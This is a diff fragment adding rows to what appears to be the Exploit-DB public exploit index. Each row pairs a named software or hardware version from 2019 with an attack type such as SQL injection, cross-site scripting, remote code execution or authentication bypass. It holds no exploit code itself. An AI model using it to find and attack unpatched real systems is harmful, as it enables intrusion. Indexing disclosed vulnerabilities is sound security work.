+47349,exploits/php/webapps/47349.txt,"FileThingie 2.5.7 - Arbitrary File Upload",2019-09-03,cakes,webapps,php,
+47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80
+47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80
+47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,
+47361,exploits/php/webapps/47361.pl,"WordPress 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php,
+47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80
+47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,xerubus,webapps,multiple,
+47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,xerubus,webapps,multiple,
+47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,xerubus,webapps,multiple,80
+47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80
+47368,exploits/cgi/webapps/47368.sh,"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure",2019-09-09,LiquidWorm,webapps,cgi,
+47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php,80
+47370,exploits/php/webapps/47370.txt,"Dolibarr ERP-CRM 10.0.1 - SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80
+47371,exploits/php/webapps/47371.txt,"WordPress Plugin Photo Gallery 1.5.34 - SQL Injection",2019-09-10,MTK,webapps,php,80
+47372,exploits/php/webapps/47372.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting",2019-09-10,MTK,webapps,php,80
+47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80
+47379,exploits/java/webapps/47379.py,"AVCON6 systems management platform - OGNL Remote Command Execution",2019-09-11,"Nassim Asrir",webapps,java,
+47380,exploits/hardware/webapps/47380.py,"eWON Flexy - Authentication Bypass",2019-09-11,Photubias,webapps,hardware,
+47384,exploits/php/webapps/47384.txt,"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting",2019-09-13,"Metin Yunus Kandemir",webapps,php,
+47385,exploits/php/webapps/47385.txt,"phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery",2019-09-13,"Manuel García Cárdenas",webapps,php,80
+47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80
+47387,exploits/php/webapps/47387.txt,"Ticket-Booking 1.4 - Authentication Bypass",2019-09-14,cakes,webapps,php,
+47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php,
+47392,exploits/cfm/webapps/47392.txt,"Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload",2019-09-16,"Pankaj Kumar Thakur",webapps,cfm,
+47395,exploits/php/webapps/47395.txt,"CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection",2019-09-16,cakes,webapps,php,
+47398,exploits/php/webapps/47398.txt,"Hospital-Management 1.26 - 'fname' SQL Injection",2019-09-18,cakes,webapps,php,
+47399,exploits/hardware/webapps/47399.txt,"Western Digital My Book World II NAS 1.02.12 - Authentication Bypass / Command Execution",2019-09-19,"Noman Riffat",webapps,hardware,
+47401,exploits/php/webapps/47401.txt,"DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection",2019-09-19,n1x_,webapps,php,
+47402,exploits/php/webapps/47402.txt,"GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting",2019-09-19,cakes,webapps,php,
+47403,exploits/php/webapps/47403.html,"LayerBB < 1.1.4 - Cross-Site Request Forgery",2019-09-20,0xB9,webapps,php,
+47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,
+47417,exploits/aspx/webapps/47417.txt,"Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistant Cross-Site Scripting",2019-09-25,"Davide Cioccia",webapps,aspx,
+47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,
+47420,exploits/json/webapps/47420.txt,"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution",2019-09-25,"Semen Alexandrovich Lyhin",webapps,json,
+47422,exploits/php/webapps/47422.txt,"YzmCMS 5.3 - 'Host' Header Injection",2019-09-25,"Debashis Pal",webapps,php,
+47423,exploits/php/webapps/47423.txt,"Chamillo LMS 1.11.8 - Arbitrary File Upload",2019-09-26,"Sohel Yousef",webapps,php,
+47424,exploits/php/webapps/47424.txt,"Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
+47425,exploits/php/webapps/47425.txt,"all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
+47426,exploits/php/webapps/47426.txt,"inoERP 4.15 - 'download' SQL Injection",2019-09-26,"Semen Alexandrovich Lyhin",webapps,php,
+47431,exploits/php/webapps/47431.txt,"thesystem App 1.0 - Persistent Cross-Site Scripting",2019-09-27,"İsmail Güngör",webapps,php,
+47427,exploits/php/webapps/47427.txt,"citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection",2019-09-26,cakes,webapps,php,
+47428,exploits/php/webapps/47428.txt,"InoERP 0.7.2 - Persistent Cross-Site Scripting",2019-09-27,strider,webapps,php,
+47430,exploits/php/webapps/47430.txt,"thesystem App 1.0 - 'server_name' SQL Injection",2019-09-27,"Sadik Cetin",webapps,php,
+47432,exploits/php/webapps/47432.txt,"thesystem App 1.0 - 'username' SQL Injection",2019-09-27,"Anıl Baran Yelken",webapps,php,
+47433,exploits/hardware/webapps/47433.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download",2019-09-27,LiquidWorm,webapps,hardware,
+47434,exploits/hardware/webapps/47434.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery",2019-09-27,LiquidWorm,webapps,hardware,
+47435,exploits/hardware/webapps/47435.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation",2019-09-27,LiquidWorm,webapps,hardware,
+47436,exploits/php/webapps/47436.txt,"WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting",2019-09-27,m0ze,webapps,php,
+47437,exploits/php/webapps/47437.rb,"vBulletin 5.x - Remote Command Execution (Metasploit)",2019-09-30,r00tpgp,webapps,php,
+47438,exploits/php/webapps/47438.txt,"phpIPAM 1.4 - SQL Injection",2019-09-30,"Kevin Kirsche",webapps,php,80
+47440,exploits/python/webapps/47440.txt,"thesystem 1.0 - Cross-Site Scripting",2019-09-30,"Anıl Baran Yelken",webapps,python,
+47441,exploits/python/webapps/47441.txt,"TheSystem 1.0 - Command Injection",2019-09-30,"Sadik Cetin",webapps,python,
+47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' disable_functions Bypass",2019-09-28,mm0r1,webapps,multiple,
+47447,exploits/php/webapps/47447.py,"vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution",2019-09-23,anonymous,webapps,php,
+47448,exploits/multiple/webapps/47448.py,"DotNetNuke < 9.4.0 - Cross-Site Scripting",2019-10-01,MaYaSeVeN,webapps,multiple,80
+47455,exploits/php/webapps/47455.php,"Detrix EDMS 1.2.3.1505 - SQL Injection",2019-10-02,"Burov Konstantin",webapps,php,80
+47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux,
+47459,exploits/multiple/webapps/47459.py,"AnchorCMS < 0.12.3a - Information Disclosure",2019-10-03,"Tijme Gommers",webapps,multiple,
+47460,exploits/php/webapps/47460.txt,"LabCollector 5.423 - SQL Injection",2019-10-04,"Carlos Avila",webapps,php,
+47462,exploits/php/webapps/47462.php,"PHP 7.0 < 7.3 (Unix) - 'gc' disable_functions Bypass",2019-10-03,mm0r1,webapps,php,
+47465,exploits/php/webapps/47465.py,"Joomla 3.4.6 - 'configuration.php' Remote Code Execution",2019-10-07,"Alessandro Groppo",webapps,php,
+47467,exploits/php/webapps/47467.txt,"Zabbix 4.2 - Authentication Bypass",2019-10-07,"Milad Khoshdel",webapps,php,
+47469,exploits/php/webapps/47469.txt,"Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting",2019-10-07,Creatigon,webapps,php,
+47470,exploits/java/webapps/47470.txt,"IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload",2019-10-07,"Jakub Palaczynski",webapps,java,
+47474,exploits/php/webapps/47474.pl,"Zabbix 4.4 - Authentication Bypass",2019-10-08,"Todor Donev",webapps,php,
+47475,exploits/php/webapps/47475.php,"vBulletin 5.0 < 5.5.4 - 'updateAvatar' Authenticated Remote Code Execution",2019-10-07,EgiX,webapps,php,
+47480,exploits/hardware/webapps/47480.txt,"SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery",2019-10-10,"Borja Merino",webapps,hardware,80
+47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80
+47491,exploits/hardware/webapps/47491.txt,"Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting",2019-10-11,"Prof. Joas Antonio",webapps,hardware,
+47492,exploits/php/webapps/47492.rb,"WordPress Arforms 3.7.1 - Directory Traversal",2019-10-11,"Ahmad Almorabea",webapps,php,
+47496,exploits/php/webapps/47496.txt,"Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting",2019-10-14,"Debashis Pal",webapps,php,
+47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,
+47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php,
+47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php,
+47505,exploits/php/webapps/47505.txt,"Accounts Accounting 7.02 - Persistent Cross-Site Scripting",2019-10-16,"Debashis Pal",webapps,php,
+47612,exploits/hardware/webapps/47612.py,"Prima FlexAir Access Control 2.3.38 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47613,exploits/aspx/webapps/47613.txt,"Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
+47614,exploits/hardware/webapps/47614.txt,"Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,hardware,
+47611,exploits/aspx/webapps/47611.txt,"Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
+47516,exploits/php/webapps/47516.txt,"WordPress Plugin  FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
+47517,exploits/php/webapps/47517.txt,"WordPress Plugin  Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
+47518,exploits/php/webapps/47518.txt,"WordPress Plugin  Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
+47520,exploits/php/webapps/47520.py,"Restaurant Management System 1.0  - Remote Code Execution",2019-10-17,"Ibad Shah",webapps,php,
+47524,exploits/php/webapps/47524.py,"Joomla! 3.4.6 - Remote Code Execution",2019-10-18,"Alessandro Groppo",webapps,php,
+47537,exploits/linux/webapps/47537.txt,"Rocket.Chat 2.1.0 - Cross-Site Scripting",2019-10-23,3H34N,webapps,linux,
+47539,exploits/php/webapps/47539.rb,"Joomla! 3.4.6 - Remote Code Execution (Metasploit)",2019-10-23,"Alessandro Groppo",webapps,php,
+47540,exploits/php/webapps/47540.txt,"WordPress Plugin Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php,
+47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware,
+47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware,
+47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,
+47545,exploits/hardware/webapps/47545.txt,"Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery",2019-10-28,"Prof. Joas Antonio",webapps,hardware,
+47546,exploits/php/webapps/47546.txt,"waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection",2019-10-28,cakes,webapps,php,
+47547,exploits/php/webapps/47547.txt,"Part-DB 0.4 - Authentication Bypass",2019-10-28,Marvoloo,webapps,php,
+47548,exploits/php/webapps/47548.txt,"waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting",2019-10-28,cakes,webapps,php,
+47550,exploits/php/webapps/47550.txt,"delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection",2019-10-28,cakes,webapps,php,
+47553,exploits/php/webapps/47553.md,"PHP-FPM + Nginx - Remote Code Execution",2019-10-28,"Emil Lerner",webapps,php,
+47555,exploits/php/webapps/47555.py,"rConfig 3.9.2 - Remote Code Execution",2019-10-29,Askar,webapps,php,
+47557,exploits/php/webapps/47557.txt,"WordPress Core 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php,
+47560,exploits/json/webapps/47560.rb,"Ajenti 2.1.31 - Remote Code Exection (Metasploit)",2019-10-30,"Onur ER",webapps,json,
+47561,exploits/xml/webapps/47561.txt,"Citrix StoreFront Server 7.15 - XML External Entity Injection",2019-10-30,"Vahagn Vardanyan",webapps,xml,
+47562,exploits/hardware/webapps/47562.sh,"iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure",2019-10-30,LiquidWorm,webapps,hardware,
+47567,exploits/php/webapps/47567.txt,"WordPress Plugin Google Review Slider 6.1 - 'tid' SQL Injection",2019-10-31,"Princy Edward",webapps,php,
+47569,exploits/php/webapps/47569.txt,"TheJshen contentManagementSystem 1.04 - 'id' SQL Injection",2019-11-01,cakes,webapps,php,
+47571,exploits/linux/webapps/47571.txt,"ownCloud 10.3.0 stable - Cross-Site Request Forgery",2019-11-01,"Ozer Goker",webapps,linux,
+47572,exploits/java/webapps/47572.py,"Apache Solr 8.2.0 - Remote Code Execution",2019-11-01,@l3x_wong,webapps,java,
+47581,exploits/php/webapps/47581.txt,"thejshen Globitek CMS 1.4 - 'id' SQL Injection",2019-11-05,cakes,webapps,php,80
+47583,exploits/php/webapps/47583.txt,"thrsrossi Millhouse-Project 1.414 - 'content' Persistent Cross-Site Scripting",2019-11-05,cakes,webapps,php,80
+47585,exploits/php/webapps/47585.txt,"rimbalinux AhadPOS 1.11 - 'alamatCustomer' SQL Injection",2019-11-05,cakes,webapps,php,80
+47587,exploits/php/webapps/47587.txt,"html5_snmp 1.11 - 'Remark' Persistent Cross-Site Scripting",2019-11-05,cakes,webapps,php,80
+47588,exploits/php/webapps/47588.txt,"html5_snmp 1.11 - 'Router_ID' SQL Injection",2019-11-05,cakes,webapps,php,80
+47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80
+47595,exploits/hardware/webapps/47595.txt,"Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass",2019-11-06,LiquidWorm,webapps,hardware,
+47596,exploits/hardware/webapps/47596.sh,"Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure",2019-11-06,LiquidWorm,webapps,hardware,
+47598,exploits/java/webapps/47598.py,"Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting",2019-11-08,vesche,webapps,java,
+47600,exploits/php/webapps/47600.py,"Adive Framework 2.0.7 - Privilege Escalation",2019-11-08,"Pablo Santiago",webapps,php,
+47603,exploits/php/webapps/47603.txt,"Nextcloud 17 - Cross-Site Request Forgery",2019-11-08,"Ozer Goker",webapps,php,
+47616,exploits/hardware/webapps/47616.txt,"eMerge E3 1.00-06 - Unauthenticated Directory Traversal",2019-11-12,LiquidWorm,webapps,hardware,
+47618,exploits/hardware/webapps/47618.txt,"eMerge E3 1.00-06 - Privilege Escalation",2019-11-12,LiquidWorm,webapps,hardware,
+47619,exploits/hardware/webapps/47619.py,"eMerge E3 1.00-06 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47620,exploits/hardware/webapps/47620.txt,"eMerge E3 1.00-06 - Cross-Site Request Forgery",2019-11-12,LiquidWorm,webapps,hardware,
+47621,exploits/jsp/webapps/47621.py,"Atlassian Confluence 6.15.1 - Directory Traversal",2019-11-12,max7253,webapps,jsp,
+47622,exploits/hardware/webapps/47622.py,"eMerge E3 1.00-06 - Arbitrary File Upload",2019-11-12,LiquidWorm,webapps,hardware,
+47623,exploits/hardware/webapps/47623.txt,"eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,hardware,
+47624,exploits/hardware/webapps/47624.sh,"eMerge50P 5000P 4.6.07 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47627,exploits/hardware/webapps/47627.py,"CBAS-Web 19.0.0 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47628,exploits/hardware/webapps/47628.txt,"CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)",2019-11-12,LiquidWorm,webapps,hardware,
+47630,exploits/hardware/webapps/47630.txt,"CBAS-Web 19.0.0 - Username Enumeration",2019-11-12,LiquidWorm,webapps,hardware,
+47631,exploits/php/webapps/47631.txt,"CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection",2019-11-12,LiquidWorm,webapps,php,
+47632,exploits/php/webapps/47632.txt,"Joomla 3.9.13 - 'Host' Header Injection",2019-11-12,"Pablo Santiago",webapps,php,
+47633,exploits/alpha/webapps/47633.txt,"Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,alpha,
+47634,exploits/hardware/webapps/47634.txt,"Prima Access Control 2.3.35 - Arbitrary File Upload",2019-11-12,LiquidWorm,webapps,hardware,
+47635,exploits/jsp/webapps/47635.rb,"Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)",2019-11-12,max7253,webapps,jsp,
+47636,exploits/hardware/webapps/47636.txt,"Optergy 2.3.0a - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47638,exploits/hardware/webapps/47638.sh,"FlexAir Access Control 2.4.9api3 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47639,exploits/hardware/webapps/47639.txt,"Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)",2019-11-12,LiquidWorm,webapps,hardware,
+47640,exploits/hardware/webapps/47640.txt,"Optergy 2.3.0a - Username Disclosure",2019-11-12,LiquidWorm,webapps,hardware,
+47641,exploits/hardware/webapps/47641.py,"Optergy 2.3.0a - Remote Code Execution (Backdoor)",2019-11-12,LiquidWorm,webapps,hardware,
+47643,exploits/aspx/webapps/47643.txt,"Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
+47644,exploits/hardware/webapps/47644.py,"FlexAir Access Control 2.3.35 - Authentication Bypass",2019-11-12,LiquidWorm,webapps,hardware,
+47648,exploits/hardware/webapps/47648.txt,"Bematech Printer MP-4200 - Denial of Service",2019-11-12,"Jonatas Fil",webapps,hardware,
+47649,exploits/hardware/webapps/47649.py,"Linear eMerge E3 1.00-06 - Remote Code Execution",2019-11-13,LiquidWorm,webapps,hardware,
+47650,exploits/php/webapps/47650.txt,"FUDForum 3.0.9 - Remote Code Execution",2019-11-13,liquidsky,webapps,php,
+47651,exploits/hardware/webapps/47651.txt,"Technicolor TD5130.2 - Remote Command Execution",2019-11-13,"João Teles",webapps,hardware,
+47652,exploits/hardware/webapps/47652.py,"Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting",2019-11-13,"Luis Santana",webapps,hardware,
+47653,exploits/php/webapps/47653.txt,"gSOAP 2.8 - Directory Traversal",2019-11-13,"numan türle",webapps,php,
+47654,exploits/hardware/webapps/47654.py,"Fastweb Fastgate 0.00.81 - Remote Code Execution",2019-11-13,"Riccardo Gasparini",webapps,hardware,
+47659,exploits/php/webapps/47659.txt,"Xfilesharing 2.5.1 - Arbitrary File Upload",2019-11-14,"Noman Riffat",webapps,php,
+47663,exploits/hardware/webapps/47663.txt,"Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal",2019-11-18,"Kevin Randall",webapps,hardware,
+47666,exploits/asp/webapps/47666.txt,"Crystal Live HTTP Server 6.01 - Directory Traversal",2019-11-18,"numan türle",webapps,asp,
+47669,exploits/hardware/webapps/47669.sh,"Centova Cast 3.2.11 - Arbitrary File Download",2019-11-18,DroidU,webapps,hardware,
+47670,exploits/php/webapps/47670.txt,"TemaTres 3.0 - Cross-Site Request Forgery (Add Admin)",2019-11-18,"Pablo Santiago",webapps,php,
+47672,exploits/php/webapps/47672.txt,"TemaTres 3.0 - 'value' Persistent Cross-site Scripting",2019-11-18,"Pablo Santiago",webapps,php,
+47688,exploits/multiple/webapps/47688.md,"Apache Httpd mod_proxy - Error Page Cross-Site Scripting",2019-10-14,"Sebastian Neef",webapps,multiple,
+47689,exploits/multiple/webapps/47689.md,"Apache Httpd mod_rewrite - Open Redirects",2019-10-14,"Sebastian Neef",webapps,multiple,
+47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,
+47691,exploits/php/webapps/47691.sh,"OpenNetAdmin 18.1.1 - Remote Code Execution",2019-11-20,mattpascoe,webapps,php,
+47702,exploits/hardware/webapps/47702.txt,"TestLink 1.9.19 - Persistent Cross-Site Scripting",2019-11-21,"Milad Khoshdel",webapps,hardware,
+47704,exploits/hardware/webapps/47704.txt,"Network Management Card 6.2.0 - Host Header Injection",2019-11-21,"Amal E Thamban",webapps,hardware,
+47720,exploits/php/webapps/47720.txt,"WordPress Core 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
+47722,exploits/android/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,android,
+47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,
+47730,exploits/php/webapps/47730.txt,"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery",2019-12-02,LiquidWorm,webapps,php,
+47731,exploits/php/webapps/47731.txt,"Dokuwiki 2018-04-22b - Username Enumeration",2019-12-02,"Talha ŞEN",webapps,php,
+47737,exploits/php/webapps/47737.txt,"Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting",2019-12-03,"Cemal Cihad ÇİFTÇİ",webapps,php,
+47738,exploits/hardware/webapps/47738.txt,"Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery",2019-12-03,"Prof. Joas Antonio",webapps,hardware,80
+47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,
+47741,exploits/php/webapps/47741.txt,"Online Clinic Management System 2.2 - HTML Injection",2019-12-04,"Cemal Cihad ÇİFTÇİ",webapps,php,
+47749,exploits/php/webapps/47749.php,"Verot 2.0.3 - Remote Code Execution",2019-12-06,"Jinny Ramsmark",webapps,php,
+47744,exploits/hardware/webapps/47744.txt,"Cisco WLC 2504 8.9 - Denial of Service (PoC)",2019-12-04,SecuNinja,webapps,hardware,
+47745,exploits/php/webapps/47745.txt,"OwnCloud 8.1.8 - Username Disclosure",2019-12-04,"Daniel Moreno",webapps,php,
+47748,exploits/windows/webapps/47748.py,"Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution",2019-12-05,"Peter Lapp",webapps,windows,
+47756,exploits/php/webapps/47756.txt,"Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting",2019-12-09,"Metin Yunus Kandemir",webapps,php,
+47758,exploits/php/webapps/47758.txt,"PRO-7070 Hazır Profesyonel Web Sitesi 1.0 - Authentication Bypass",2019-12-09,"Ahmet Ümit BAYRAM",webapps,php,
+47760,exploits/hardware/webapps/47760.py,"Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution",2019-12-09,Hodorsec,webapps,hardware,
+47761,exploits/php/webapps/47761.py,"Alcatel-Lucent Omnivista 8770 - Remote Code Execution",2019-12-09,0x1911,webapps,php,
+47762,exploits/java/webapps/47762.txt,"Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting",2019-12-09,omurugur,webapps,java,
+47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware,
+47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware,
+47770,exploits/java/webapps/47770.txt,"Apache Olingo OData 4.0 - XML External Entity Injection",2019-12-11,"Compass Security",webapps,java,
+47772,exploits/php/webapps/47772.rb,"OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)",2019-12-12,"Onur ER",webapps,php,
+47773,exploits/php/webapps/47773.txt,"Bullwark Momentum Series JAWS 1.0 - Directory Traversal",2019-12-12,"numan türle",webapps,php,
+47774,exploits/hardware/webapps/47774.txt,"NVMS 1000 - Directory Traversal",2019-12-13,"numan türle",webapps,hardware,
+47776,exploits/hardware/webapps/47776.txt,"D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting",2019-12-16,"Sanyam Chawla",webapps,hardware,
+47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,
+47778,exploits/hardware/webapps/47778.txt,"D-Link DIR-615 - Privilege Escalation",2019-12-16,"Sanyam Chawla",webapps,hardware,
+47781,exploits/java/webapps/47781.txt,"Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting",2019-12-17,MTK,webapps,java,
+47782,exploits/hardware/webapps/47782.py,"Netgear R6400 - Remote Code Execution",2019-12-17,"Kevin Randall",webapps,hardware,
+47783,exploits/aspx/webapps/47783.py,"NopCommerce 4.2.0 -  Privilege Escalation",2019-12-17,"Alessandro Magnosi",webapps,aspx,
+47785,exploits/windows/webapps/47785.txt,"Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)",2019-12-18,"Ismail Tasdelen",webapps,windows,
+47787,exploits/hardware/webapps/47787.txt,"Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)",2019-12-18,"Ismail Tasdelen",webapps,hardware,
+47789,exploits/asp/webapps/47789.txt,"Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting",2019-12-18,"Harshit Shukla",webapps,asp,
+47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,
+47796,exploits/hardware/webapps/47796.txt,"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation",2019-12-19,Vulnerability-Lab,webapps,hardware,
+47798,exploits/php/webapps/47798.txt,"phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting",2019-12-20,"Chris Inzinga",webapps,php,
+47800,exploits/php/webapps/47800.py,"WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service",2019-12-17,roddux,webapps,php,
+47806,exploits/hardware/webapps/47806.txt,"HomeAutomation 3.3.2 - Persistent Cross-Site Scripting",2019-12-30,LiquidWorm,webapps,hardware,
+47807,exploits/php/webapps/47807.txt,"HomeAutomation 3.3.2 - Authentication Bypass",2019-12-30,LiquidWorm,webapps,php,
+47808,exploits/php/webapps/47808.txt,"HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)",2019-12-30,LiquidWorm,webapps,php,
+47809,exploits/php/webapps/47809.txt,"HomeAutomation 3.3.2 - Remote Code Execution",2019-12-30,LiquidWorm,webapps,php,
+47811,exploits/windows/webapps/47811.txt,"elearning-script 1.0 - Authentication Bypass",2019-12-30,riamloo,webapps,windows,
+47813,exploits/hardware/webapps/47813.txt,"XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)",2019-12-30,"Ismail Tasdelen",webapps,hardware,
